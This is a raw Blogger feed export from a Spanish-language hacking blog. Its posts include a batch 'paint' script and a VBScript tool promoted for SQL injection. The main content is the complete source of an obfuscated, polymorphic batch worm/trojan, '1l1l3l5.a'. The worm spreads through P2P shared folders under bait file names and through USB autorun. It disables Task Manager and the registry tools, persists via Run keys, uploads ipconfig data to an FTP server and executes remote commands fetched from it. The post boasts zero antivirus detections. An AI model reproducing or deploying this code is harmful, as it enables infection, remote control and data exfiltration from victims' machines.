Exist Col.vbs Call :Col ^&gt;^&gt;col.vbs&lt;br /&gt;Echo.:Draw&lt;br /&gt;Goto :Eof&lt;br /&gt;&lt;br /&gt;:Col_Deb&lt;br /&gt;%1:Col&lt;br /&gt;%1Echo.On Error Resume Next&lt;br /&gt;%1Echo.HexColor = Right("0" %~2^&amp;amp; wscript.arguments(2), 2)&lt;br /&gt;%1Echo.Set oExec = CreateObject("WScript.Shell").Exec("%comspec% /c debug ")&lt;br /&gt;%1Echo.&lt;br /&gt;%1Echo.Do Until oExec.StdOut.Read(1) = "-"&lt;br /&gt;%1Echo.  wsh.sleep 10&lt;br /&gt;%1Echo.Loop&lt;br /&gt;%1Echo.&lt;br /&gt;%1Echo.Dim Textos&lt;br /&gt;%1Echo.Textos = Replace(wscript.arguments(3), Chr(195), "Û")&lt;br /&gt;%1Echo.WriteXY wscript.arguments(0), wscript.arguments(1), HexColor, Textos&lt;br /&gt;%1Echo.&lt;br /&gt;%1Echo.oExec.StdIn.Writeline "e0:451 2A"&lt;br /&gt;%1Echo.oExec.StdIn.Writeline "q"&lt;br /&gt;%1Echo.&lt;br /&gt;%1Echo.Sub WriteXY(X, Y, hColor, sText)&lt;br /&gt;%1Echo.Dim ColorText&lt;br /&gt;%1Echo.  For j = 1 to Len(sText) Step 10&lt;br /&gt;%1Echo.    ColorText = "EB800:" %~2^&amp;amp; Hex(Y * 160 + (X + j - 1) * 2)&lt;br /&gt;%1Echo.    For i = j to j + 9&lt;br /&gt;%1Echo.      ColorText = ColorText %~2^&amp;amp; " " %~2^&amp;amp; Hex(Asc(Mid(sText, i, 1))) %~2^&amp;amp; " " %~2^&amp;amp; hColor&lt;br /&gt;%1Echo.      if i = Len(sText) Then Exit For&lt;br /&gt;%1Echo.    Next&lt;br /&gt;%1Echo.    oExec.StdIn.Writeline ColorText&lt;br /&gt;%1Echo.  Next&lt;br /&gt;%1Echo.End Sub&lt;br /&gt;%1Attrib +H Col.vbs&lt;br /&gt;%1Goto :Eof&lt;br /&gt;Goto :Eof&lt;br /&gt;&lt;/nul&gt;&lt;/nul&gt;&lt;/code&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1525638350117099508-6776495397324929565?l=xassiz.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://xassiz.blogspot.com/feeds/6776495397324929565/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://xassiz.blogspot.com/2009/09/batvbsdeb-batch-paint.html#comment-form' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1525638350117099508/posts/default/6776495397324929565'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1525638350117099508/posts/default/6776495397324929565'/><link rel='alternate' type='text/html' href='http://xassiz.blogspot.com/2009/09/batvbsdeb-batch-paint.html' title='[bat][vbs][deb] Batch Paint'/><author><name>xassiz</name><uri>http://www.blogger.com/profile/15634923301921834243</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1525638350117099508.post-1488324032238640180</id><published>2009-09-28T12:01:00.000-07:00</published><updated>2009-09-28T12:11:16.071-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='ASCII'/><category scheme='http://www.blogger.com/atom/ns#' term='SQL Injection'/><category scheme='http://www.blogger.com/atom/ns#' term='VBScript'/><category scheme='http://www.blogger.com/atom/ns#' term='Defacing'/><title type='text'>[Aplicacion] ASCIIC - by xassiz</title><content type='html'>&lt;div style="text-align: center;"&gt;&lt;span style="color: rgb(255, 0, 0); font-family: verdana; font-weight: bold;font-size:180%;" &gt;ASCIIC - by xassiz&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family: verdana;"&gt;Bueno, os dejo esta aplicacion que acabo de programar en &lt;/span&gt;&lt;span style="font-weight: bold; font-family: verdana;"&gt;VBScript&lt;/span&gt;&lt;span style="font-family: verdana;"&gt; xDD&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family: verdana;"&gt;Pasa una cadena a ASCII y además tiene la opción de copiar el resultado al portapapeles.. =)&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family: verdana;"&gt;Esta perfecto para convertir las tablas en una inyección SQL.&lt;/span&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://xasscapturas.webcindario.com/Aplicaciones/ASCIIC.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 379px; height: 168px;" src="http://xasscapturas.webcindario.com/Aplicaciones/ASCIIC.jpg" alt="" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;div style="text-align: center;"&gt;&lt;span style="font-family: verdana;font-size:130%;" &gt;&lt;a style="color: rgb(255, 255, 0);" href="http://downxassiz.webcindario.com/ASCIIC_by_xassiz.rar" target="_blank"&gt;&lt;span style="line-height: 1.3em;"&gt;Descarga Aqui&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Pass: &lt;span style="color: rgb(51, 204, 0);"&gt;xassiz09&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;div style="text-align: left;"&gt;&lt;span style="font-family: verdana;"&gt;Espero que os guste =D&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-style: italic; font-family: verdana;"&gt;bytes!&lt;/span&gt;&lt;br /&gt;&lt;span style="font-size:130%;"&gt;&lt;span style="color: rgb(51, 204, 0);"&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1525638350117099508-1488324032238640180?l=xassiz.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://xassiz.blogspot.com/feeds/1488324032238640180/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://xassiz.blogspot.com/2009/09/aplicacion-asciic-by-xassiz.html#comment-form' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1525638350117099508/posts/default/1488324032238640180'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1525638350117099508/posts/default/1488324032238640180'/><link rel='alternate' type='text/html' href='http://xassiz.blogspot.com/2009/09/aplicacion-asciic-by-xassiz.html' title='[Aplicacion] ASCIIC - by xassiz'/><author><name>xassiz</name><uri>http://www.blogger.com/profile/15634923301921834243</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1525638350117099508.post-1696165619232756719</id><published>2009-09-28T11:50:00.000-07:00</published><updated>2009-09-28T11:54:11.111-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Batch'/><category scheme='http://www.blogger.com/atom/ns#' term='Troyanos'/><title type='text'>[Troyano Parasitario] 1l1l3l5.a</title><content type='html'>&lt;span style="font-family: verdana;"&gt;Bueno,&lt;/span&gt;&lt;b style="font-family: verdana;"&gt;&lt;span style="font-weight: bold;"&gt; &lt;/span&gt;&lt;/b&gt;&lt;span style="font-family: verdana;"&gt;como sabeis, &lt;span style="color: rgb(255, 0, 0);font-size:130%;" &gt;&lt;span style="font-weight: bold;"&gt;Batch No tiene Limites&lt;/span&gt;&lt;/span&gt;!!&lt;/span&gt;&lt;b style="font-family: verdana;"&gt;&lt;br /&gt;&lt;br /&gt;Ejecutando comandos remotamente:&lt;/b&gt;&lt;br /&gt;&lt;span style="font-family: verdana;"&gt;El troyano al infectar una maquina envia al servidor FTP un archivo del formato:&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: verdana;color:yellow;" &gt;%username%at%userdomain%&lt;/span&gt;&lt;span style="font-family: verdana;"&gt;_&lt;/span&gt;&lt;span style="font-family: verdana;color:green;" &gt;ipcfg&lt;/span&gt;&lt;span style="font-family: verdana;"&gt;.t&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: verdana;"&gt;conteniendo la salida del comando 'ipconfig/all'.&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: verdana;"&gt;Para ejecutar un comando el esa PC basta con crear un archivo del formato:&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: verdana;color:yellow;" &gt;%username%at%userdomain%&lt;/span&gt;&lt;span style="font-family: verdana;"&gt;_&lt;/span&gt;&lt;span style="font-family: verdana;color:red;" &gt;cmd&lt;/span&gt;&lt;span style="font-family: verdana;"&gt;.t&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: verdana;"&gt;conteniendo el/los comandos a ejecutar, si se ejecuto correctamente, el archivo "%username%at%userdomain%_cmd.t" sera eliminado automaticamente del servidor.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;code&gt;&lt;br /&gt;:: 1l1l3l5.a // lil %ini%&lt;br /&gt;:: Autor: lShadowl %ini%&lt;br /&gt;:: SO Objetivo/Target OS: Windows Xp Pro %ini%&lt;br /&gt;:: Propagation: P2P/rar, flash drives (it stay resident looking for new drives to infect) %ini%&lt;br /&gt;:: Propagacion: P2P/rar, flash drives (queda residente en la memoria esperando que nuevos dispositivos se conecten para infectarlos) %ini%&lt;br /&gt;:: Polimorfism: translocation, string morphing, 90-180 bytes added per every run %ini%&lt;br /&gt;:: Polimorfismo: translocacion de codigo, mutacion de cadenas, 90-180 bytes mas cada ves que es ejecutado  %ini%&lt;br /&gt;:: Payload: Drops a FTP troyan that allows attacker to execute remote commands and scripts  %ini%&lt;br /&gt;:: Payload: Carga un troyano que le permite al atacante ejecutar comandos y scripts de manera remota via FTP %ini%&lt;br /&gt;:: Fecha de creacion/Realese Date: 24/9/09 %ini%&lt;br /&gt;:: Disclaimer: %ini%&lt;br /&gt;::  This script contains malicious code. %ini%&lt;br /&gt;::  Possessing, using, spreading, compiling and linking it, possessing, using and spreading %ini%&lt;br /&gt;::  of the executable form of this script is illegal and it is forbidden in many countries. %ini%&lt;br /&gt;::  Should you do such a thing, the author may not be held responsible for any damage that %ini%&lt;br /&gt;::  occurred from the use of this source code. The actual purpose of this source code is for %ini%&lt;br /&gt;::  educational purposes and as an object of study. This source code comes as is and the author %ini%&lt;br /&gt;::  can not be held responsible for the existence of other modified variants of this code. %ini%&lt;br /&gt;@%systemdrive% %ini%&lt;br /&gt;@set sdjf=fictsoehnda %ini%&lt;br /&gt;@set agnvl=%sdjf:~4,1%%sdjf:~6,1%%sdjf:~3,1% %ini%&lt;br /&gt;@%agnvl%egnkv=%sdjf:~6,1%%sdjf:~2,1%%sdjf:~7,1%%sdjf:~5,1% %ini%&lt;br /&gt;@%agnvl%fsdhf=%sdjf:~0,2%%sdjf:~8,2% %ini%&lt;br /&gt;@%agnvl%mys=%windir%\system32\sysio\lil.bat %ini%&lt;br /&gt;@%egnkv%off %ini%&lt;br /&gt;%agnvl: =%local enabledelayedexpansion %ini%&lt;br /&gt;@md %windir%\system32\sysio &gt;nul %ini%&lt;br /&gt;if not exist %mys% ( @copy /y %0 %mys% &gt;nul %ini%&lt;br /&gt;attrib +h %mys%) %ini%&lt;br /&gt;call:_%1 %2 %ini%&lt;br /&gt;exit %ini%&lt;br /&gt;:_ %ini%&lt;br /&gt;call:_h432crt perp %ini%&lt;br /&gt;exit %ini%&lt;br /&gt;:_mut %ini%&lt;br /&gt;%fsdhf%"ini"&lt;%mys%&gt;%windir%\system32\sysio\$ %ini%&lt;br /&gt;:rnd_b %ini%&lt;br /&gt;call :rnd %ini%&lt;br /&gt;:buc %ini%&lt;br /&gt;%fsdhf%"m%r: =%"&lt;%windir%\system32\sysio\$&gt;nul&amp;amp;&amp;amp;(goto:tst) %ini%&lt;br /&gt;%fsdhf%"m%r: =%"&lt;%mys%&gt;&gt;%windir%\system32\sysio\$ %ini%&lt;br /&gt;%agnvl%/a rdnmm=%random%*9999999 %ini%&lt;br /&gt;%egnkv%::%rdnmm% %%m%r: =%%%&gt;&gt;%windir%\system32\sysio\$ %ini%&lt;br /&gt;:tst %ini%&lt;br /&gt;%agnvl%a=1 %ini%&lt;br /&gt;for /L %%a in (0,1,9) do call:cmp %%a %ini%&lt;br /&gt;%egnkv%%a%|%fsdhf: =%str /C:"o" &gt;nul&amp;amp;&amp;amp;(goto:rnd_b) %ini%&lt;br /&gt;attrib -h %mys% %ini%&lt;br /&gt;type %windir%\system32\sysio\$&gt;%mys% %ini%&lt;br /&gt;ping -n 2 localhost&gt;nul %ini%&lt;br /&gt;attrib +h %mys% %ini%&lt;br /&gt;del /f /q %windir%\system32\sysio\asjdhau.vbs %ini%&lt;br /&gt;%egnkv%%agnvl%dfjalds=createobject("scripting.filesystemobject")&gt;&gt;%windir%\system32\sysio\asjdhau.vbs %ini%&lt;br /&gt;%egnkv%%agnvl%kdflekj=dfjalds.opentextfile("%mys%",1)&gt;&gt;%windir%\system32\sysio\asjdhau.vbs %ini%&lt;br /&gt;%egnkv%askdajs=kdflekj.readall&gt;&gt;%windir%\system32\sysio\asjdhau.vbs %ini%&lt;br /&gt;%egnkv%kdflekj.close&gt;&gt;%windir%\system32\sysio\asjdhau.vbs %ini%&lt;br /&gt;%egnkv%Randomize&gt;&gt;%windir%\system32\sysio\asjdhau.vbs %ini%&lt;br /&gt;%egnkv%ahqiaohe=chr(int(22*rnd)+97)^&amp;amp;chr(int(22*rnd)+97)^&amp;amp;chr(int(22*rnd)+97)^&amp;amp;chr(int(22*rnd)+97)^&amp;amp;chr(int(22*rnd)+97)&gt;&gt;%windir%\system32\sysio\asjdhau.vbs %ini%&lt;br /&gt;%egnkv%jdfasuu=chr(int(22*rnd)+97)^&amp;amp;chr(int(22*rnd)+97)^&amp;amp;chr(int(22*rnd)+97)^&amp;amp;chr(int(22*rnd)+97)^&amp;amp;chr(int(22*rnd)+97)&gt;&gt;%windir%\system32\sysio\asjdhau.vbs %ini%&lt;br /&gt;%egnkv%dwudhqw=chr(int(22*rnd)+97)^&amp;amp;chr(int(22*rnd)+97)^&amp;amp;chr(int(22*rnd)+97)^&amp;amp;chr(int(22*rnd)+97)^&amp;amp;chr(int(22*rnd)+97)&gt;&gt;%windir%\system32\sysio\asjdhau.vbs %ini%&lt;br /&gt;%egnkv%asdwdkw=chr(int(22*rnd)+97)^&amp;amp;chr(int(22*rnd)+97)^&amp;amp;chr(int(22*rnd)+97)^&amp;amp;chr(int(22*rnd)+97)^&amp;amp;chr(int(22*rnd)+97)&gt;&gt;%windir%\system32\sysio\asjdhau.vbs %ini%&lt;br /&gt;%egnkv%sjdfhjs=Replace(askdajs,"sdjf",ahqiaohe)&gt;&gt;%windir%\system32\sysio\asjdhau.vbs %ini%&lt;br /&gt;%egnkv%lasdaod=Replace(sjdfhjs,"agnvl",jdfasuu)&gt;&gt;%windir%\system32\sysio\asjdhau.vbs %ini%&lt;br /&gt;%egnkv%skdnmxi=Replace(lasdaod,"egnkv",dwudhqw)&gt;&gt;%windir%\system32\sysio\asjdhau.vbs %ini%&lt;br /&gt;%egnkv%sjsabwu=Replace(skdnmxi,"fsdhf",asdwdkw)&gt;&gt;%windir%\system32\sysio\asjdhau.vbs %ini%&lt;br /&gt;%egnkv%%agnvl%skdjawuj=dfjalds.opentextfile("%mys%",2)&gt;&gt;%windir%\system32\sysio\asjdhau.vbs %ini%&lt;br /&gt;%egnkv%skdjawuj.write sjsabwu&gt;&gt;%windir%\system32\sysio\asjdhau.vbs %ini%&lt;br /&gt;start %windir%\system32\sysio\asjdhau.vbs %ini%&lt;br /&gt;del /f /q %windir%\system32\sysio\h432.vbs,%windir%\system32\sysio\$&amp;amp;&amp;amp; exit %ini%&lt;br /&gt;:_h432crt %m5%&lt;br /&gt;%egnkv%%agnvl%xect=CREATEOBJECT("WSCRIPT.SHELL")&gt;%windir%\system32\sysio\h432.vbs %m5%&lt;br /&gt;%egnkv%xect.run "cmd /c %mys%%1", vbhide&gt;&gt;%windir%\system32\sysio\h432.vbs&amp;amp;&amp;amp; start %windir%\system32\sysio\h432.vbs&amp;amp;&amp;amp; goto :eof %m5%&lt;br /&gt;:cmp %m7%&lt;br /&gt;%fsdhf%"m%1"&lt;%windir%\system32\sysio\$&gt;nul %m7%&lt;br /&gt;if %errorlevel%==1 (%agnvl% a=%a%o %m7%&lt;br /&gt;goto:eof) %m7%&lt;br /&gt;%agnvl% a=%a%x %m7%&lt;br /&gt;goto :EOF %m7%&lt;br /&gt;:rnd %m6%&lt;br /&gt;%agnvl%/a r=%random%%%10 %m6%&lt;br /&gt;goto:eof %m6%&lt;br /&gt;:_perp %m1%&lt;br /&gt;r%sdjf:~6,1%g %sdjf:~10,1%%sdjf:~9,1%%sdjf:~9,1% "HKCU\Softw%sdjf:~10,1%r%sdjf:~6,1%\Microsoft\Win%sdjf:~9,1%ows\Curr%sdjf:~6,1%ntV%sdjf:~6,1%rsion\Polici%sdjf:~6,1%s\%sdjf:~6,1%xplor%sdjf:~6,1%r" /v NoFol%sdjf:~9,1%%sdjf:~6,1%rOptions /t R%sdjf:~6,1%G_%sdjf:~9,1%WOR%sdjf:~9,1% /%sdjf:~9,1% "1" /f %m1%&lt;br /&gt;r%sdjf:~6,1%g %sdjf:~10,1%%sdjf:~9,1%%sdjf:~9,1% "HKCU\Softw%sdjf:~10,1%r%sdjf:~6,1%\Microsoft\Win%sdjf:~9,1%ows\Curr%sdjf:~6,1%ntv%sdjf:~6,1%rsion\Polici%sdjf:~6,1%s\Syst%sdjf:~6,1%m" /v %sdjf:~9,1%is%sdjf:~10,1%bl%sdjf:~6,1%T%sdjf:~10,1%skMgr /t r%sdjf:~6,1%g_%sdjf:~9,1%wor%sdjf:~9,1% /%sdjf:~9,1% "1" /f %m1%&lt;br /&gt;r%sdjf:~6,1%g %sdjf:~10,1%%sdjf:~9,1%%sdjf:~9,1% "HKCU\Softw%sdjf:~10,1%r%sdjf:~6,1%\Microsoft\Win%sdjf:~9,1%ows\Curr%sdjf:~6,1%ntV%sdjf:~6,1%rsion\Polici%sdjf:~6,1%s\Syst%sdjf:~6,1%m" /v %sdjf:~9,1%is%sdjf:~10,1%bl%sdjf:~6,1%R%sdjf:~6,1%gistryTools /t r%sdjf:~6,1%g_%sdjf:~9,1%wor%sdjf:~9,1% /%sdjf:~9,1% "1" /f %m1%&lt;br /&gt;reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v lilUpdate /t REG_SZ /d %mys%/f %m1%&lt;br /&gt;reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v AvUpdate /t REG_SZ /d %windir%\system32\sysio\h42.vbs /f %m1%&lt;br /&gt;del /q %windir%\system32\sysio\t.rar %m1%&lt;br /&gt;%systemdrive%&amp;amp;&amp;amp; set rc=1 %m1%&lt;br /&gt;if exist "%programfiles%\WINRAR\WinRAR.exe" (set r="%programfiles%\WINRAR\WinRAR.exe" %m1%&lt;br /&gt;%r% a -ibck -y %windir%\system32\sysio\t.rar %mys: =% %m1%&lt;br /&gt;if not %errorlevel%==9009 set rc=0) %m1%&lt;br /&gt;for %%a in ("%userprofile%\Configuraci¢n local\Datos de programa\Ares\My Shared Folder\" "%userprofile%\Local Settings\Application Data\Ares\My Shared Folder\" "%programfiles%\eMule\Incoming\" "%programfiles%\Shareaza\Downloads\" "%programfiles%\BearShare\Shared\" "%programfiles%\LimeWire\Shared\") do (if exist "%%a" (cd "%%a" %m1%  &lt;br /&gt;for %%e in (*.rar) do (type !mys: =!&gt;"%%~ne.bat" %m1%&lt;br /&gt;ping -n 2 localhost &gt;nul&amp;amp;&amp;amp; !r! a -ibck -y "%%e" "%%~ne.bat")      %m1%&lt;br /&gt;for %%g in ("XXX Photos" dvdrip glee "Keygen Constructor" wii psp "Keygen ALL" fringe surrogates "Nude Celebrities" "MSN hack codes" "Password list" "Activation tool" Windows7 "Windows 7 trucos" "Windows 7 tricks" "MSN Hack Tool" Photoshop "Photoshop CS4") do (type !mys: =!&gt;%%g.bat %m1%&lt;br /&gt;if !rc!==0 (ping -n 2 localhost&gt;nul&amp;amp;&amp;amp; !r! a -ibck -y %%g.rar %%g.bat)))) %m1%&lt;br /&gt;call:_h432crt fnid&amp;amp;&amp;amp; ping -n 12 localhost&gt;nul %m1%&lt;br /&gt;call:_h432crt dinfres&amp;amp;&amp;amp; ping -n 12 localhost&gt;nul&amp;amp;&amp;amp; set ertr=9 %m1%&lt;br /&gt;%fsdhf%"m%ertr: =%"&lt;%mys%&gt;%windir%\system32\sysio\fet.bat %m1%&lt;br /&gt;ping -n 1 www.google.com&gt;nul&amp;amp;&amp;amp;(if not exist %username%at%userdomain%_cmd.t ( %m1%&lt;br /&gt;%egnkv%%agnvl%xect=CREATEOBJECT("WSCRIPT.SHELL"^)&gt;%windir%\system32\sysio\h42.vbs %m1%&lt;br /&gt;%egnkv%xect.run "cmd /c %windir%\system32\sysio\fet.bat", vbhide&gt;&gt;%windir%\system32\sysio\h42.vbs %m1%&lt;br /&gt;%windir%\system32\sysio\h42.vbs)) %m1%&lt;br /&gt;call:_h432crt mut&amp;amp;&amp;amp; exit %m1%&lt;br /&gt;:_dinfres %m2%&lt;br /&gt;%egnkv%%agnvl%xect=CREATEOBJECT("WSCRIPT.SHELL")&gt;%windir%\system32\sysio\ubsh.vbs %m2%&lt;br /&gt;%egnkv%%agnvl%kjslras=GetObject("winmgmts:\\.\root\cimv2").ExecNotificationQuery _&gt;&gt;%windir%\system32\sysio\ubsh.vbs %m2%&lt;br /&gt;%egnkv%("Select*From __InstanceOperationEvent Within 10 Where " _&gt;&gt;%windir%\system32\sysio\ubsh.vbs %m2%&lt;br /&gt;%egnkv%^&amp;amp; "TargetInstance isa 'Win32_LogicalDisk'")&gt;&gt;%windir%\system32\sysio\ubsh.vbs %m2%&lt;br /&gt;%egnkv%Do While True&gt;&gt;%windir%\system32\sysio\ubsh.vbs %m2%&lt;br /&gt;%egnkv%%agnvl%asdaiw=kjslras.NextEvent&gt;&gt;%windir%\system32\sysio\ubsh.vbs %m2%&lt;br /&gt;%egnkv%If asdaiw.TargetInstance.DriveType=2 _&gt;&gt;%windir%\system32\sysio\ubsh.vbs %m2%&lt;br /&gt;%egnkv%Or asdaiw.TargetInstance.DriveType=3 Then&gt;&gt;%windir%\system32\sysio\ubsh.vbs %m2%&lt;br /&gt;%egnkv%Select Case asdaiw.Path_.Class&gt;&gt;%windir%\system32\sysio\ubsh.vbs %m2%&lt;br /&gt;%egnkv%Case "__InstanceCreationEvent"&gt;&gt;%windir%\system32\sysio\ubsh.vbs %m2%&lt;br /&gt;%egnkv%wscript.sleep 2000&gt;&gt;%windir%\system32\sysio\ubsh.vbs %m2%&lt;br /&gt;%egnkv%xect.run "cmd /c %mys%ddetc " ^&amp;amp; asdaiw.TargetInstance.DeviceId ^&amp;amp; " 1", vbhide&gt;&gt;%windir%\system32\sysio\ubsh.vbs %m2%&lt;br /&gt;%egnkv%End Select&gt;&gt;%windir%\system32\sysio\ubsh.vbs %m2%&lt;br /&gt;%egnkv%End If&gt;&gt;%windir%\system32\sysio\ubsh.vbs %m2%&lt;br /&gt;%egnkv%Loop&gt;&gt;%windir%\system32\sysio\ubsh.vbs %m2%&lt;br /&gt;taskkill /f /im wscript.exe %m2%&lt;br /&gt;start %windir%\system32\sysio\ubsh.vbs&amp;amp;&amp;amp; goto :eof %m2%&lt;br /&gt;:_fnid %m4%&lt;br /&gt;for %%i in (C: H: I: J: K: L: M: Z: Y: X: W: V: U: T: S: R: Q: P: O: N: G: F: E: D:) do (call:_ddetc %%i) %m4%&lt;br /&gt;exit %m4%&lt;br /&gt;:_ddetc %m4%&lt;br /&gt;if exist %1 (fsutil fsinfo drivetype %1|findstr /C:"CD" &gt;nul&amp;amp;&amp;amp; (&gt;nul echo.)|| (if exist %1\%sdjf:~10,1%utorun.inf ( %m4%&lt;br /&gt;for %%z in ("%1\%sdjf:~10,1%utorun.inf" "%1\lil.bat") do (%sdjf:~10,1%ttrib -h -r -s -a "%%z") %m4%&lt;br /&gt;ren %1\%sdjf:~10,1%utorun.inf %random%ow.ned) %m4%&lt;br /&gt;echo.exit|cmd/K prompt $_[%sdjf:~10,1%utorun]$_open=lil.bat$_shellexecute=lil.bat$_; &gt;"%1\%sdjf:~10,1%utorun.inf" %m4%&lt;br /&gt;type "%mys: =%"&gt;"%1\lil.bat" %m4%&lt;br /&gt;for %%z in (%1\%sdjf:~10,1%utorun.inf %1\lil.bat %1\*.ned) do (%sdjf:~10,1%ttrib +h "%%z"))) %m4%&lt;br /&gt;if %2'==' (goto:eof) else (exit) %m4%&lt;br /&gt;@%systemdrive% %m9%&lt;br /&gt;@set sdjf=fictsoehnda %m9%&lt;br /&gt;@set agnvl=%sdjf:~4,1%%sdjf:~6,1%%sdjf:~3,1% %m9%&lt;br /&gt;@%agnvl%egnkv=%sdjf:~6,1%%sdjf:~2,1%%sdjf:~7,1%%sdjf:~5,1% %m9%&lt;br /&gt;@%agnvl%fsdhf=%sdjf:~0,2%%sdjf:~8,2% %m9%&lt;br /&gt;%agnvl: =%local enabledelayedexpansion %m9%&lt;br /&gt;cd %windir%\system32\sysio %m9%&lt;br /&gt;%agnvl%"target=%windir%\system32\sysio\" %m9%&lt;br /&gt;ipconfig/all&gt;%username%at%userdomain%_ipcfg.t %m9%&lt;br /&gt;%egnkv: =%.exit|cmd/K prompt $_verbose$_open FTP.SERVER$_FTP.USER$_FTP.PASS$_cd FTP.TARGET.FOLDER$_verbose &gt;$.t %m9%&lt;br /&gt;%egnkv: =%.&gt;mello.t&amp;amp;&amp;amp; call:r $.t exit ipcfgs.t %m9%&lt;br /&gt;%egnkv: =%.exit|cmd/K prompt $_lcd "%target%"$_put %username%at%userdomain%_ipcfg.t$_ls -lF$_verbose$_quit$_rem &gt;&gt;ipcfgs.t %m9%&lt;br /&gt;taskkill /f /im ftp.exe %m9%&lt;br /&gt;ftp -s:ipcfgs.t %m9%&lt;br /&gt;%egnkv: =%.&gt;mello.t&amp;amp;&amp;amp; call:r $.t exit mello.t %m9%&lt;br /&gt;%egnkv: =%.exit|cmd/K prompt $_lcd "%target%"$_get %username%at%userdomain%_cmd.t$_ls -lF$_verbose$_quit$_rem &gt;&gt;mello.t %m9%&lt;br /&gt;:floop %m9%&lt;br /&gt;taskkill /f /im ftp.exe %m9%&lt;br /&gt;ftp -s:mello.t %m9%&lt;br /&gt;if exist %username%at%userdomain%_cmd.t for /f "delims=" %%a in (%username%at%userdomain%_cmd.t) do (%agnvl%"rcmd=%%a" %m9%&lt;br /&gt;if defined rcmd (cmd /c !rcmd! %m9%&lt;br /&gt;if !errorlevel!==0 (%egnkv: =%.&gt;"d.t"&amp;amp;&amp;amp; call:r $ exit "d.t" %m9%&lt;br /&gt;%egnkv: =%.exit|cmd/K prompt $_delete !username!at!userdomain!_cmd.t$_ls -lF$_verbose$_quit$_rem &gt;&gt;"d.t" %m9%&lt;br /&gt;taskkill /f /im ftp.exe %m9%&lt;br /&gt;ftp -s:"d.t"&gt;nul&amp;amp;&amp;amp; del /q !username!at!userdomain!_cmd.t))) %m9%&lt;br /&gt;goto:floop %m9%&lt;br /&gt;:r %m9%&lt;br /&gt;for /f "tokens=1,* delims=]" %%A in ('"type %1|find /n /v """') do (%agnvl%"current=%%B" %m9%&lt;br /&gt;if defined current (call %agnvl%current=!!current:%2=!!&amp;amp;&amp;amp; %egnkv%!current!&gt;&gt;%3) else %egnkv: =%.&gt;&gt;%3) %m9%&lt;br /&gt;goto:eof %m9%&lt;br /&gt;:: %m0%&lt;br /&gt;:: %m8%&lt;br /&gt;&lt;br /&gt;&lt;/code&gt;&lt;span style="font-family: verdana;"&gt;Debido a posibles problemas al postear he subido el archivo en formato .txt a &lt;/span&gt;&lt;a style="font-family: verdana;" href="http://www.rapidspread.com/file.jsp?id=zuj8v0sfc8" target="_blank"&gt;1l1l3l5.a.txt&lt;/a&gt;&lt;br /&gt; &lt;br /&gt; &lt;br /&gt; &lt;br /&gt; &lt;i style="font-family: verdana;"&gt;File Info&lt;/i&gt;&lt;br /&gt; &lt;br /&gt;&lt;span style="font-family: verdana;"&gt; Report generated: 28.9.2009 at 19.25.46 (GMT 1)&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: verdana;"&gt; Filename: 1l1l3l5.a.txt&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: verdana;"&gt; File size: 11 KB&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: verdana;"&gt; MD5 Hash: 7ab39a5929fa5dd09b38be6bd249fd4e&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: verdana;"&gt; SHA1 Hash: 4492A228C7D2732DCACE25B2B73F3C6EEDC896CC&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: verdana;"&gt; Self-Extract Archive: Nothing found&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: verdana;"&gt; Binder Detector: Nothing found&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: verdana;"&gt; Detection rate: 0 on 23&lt;/span&gt;&lt;br /&gt; &lt;br /&gt; &lt;i style="font-family: verdana;"&gt;Detections&lt;/i&gt;&lt;br /&gt; &lt;br /&gt;&lt;span style="font-family: verdana;"&gt; a-squared - -&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: verdana;"&gt; Avira AntiVir - -&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: 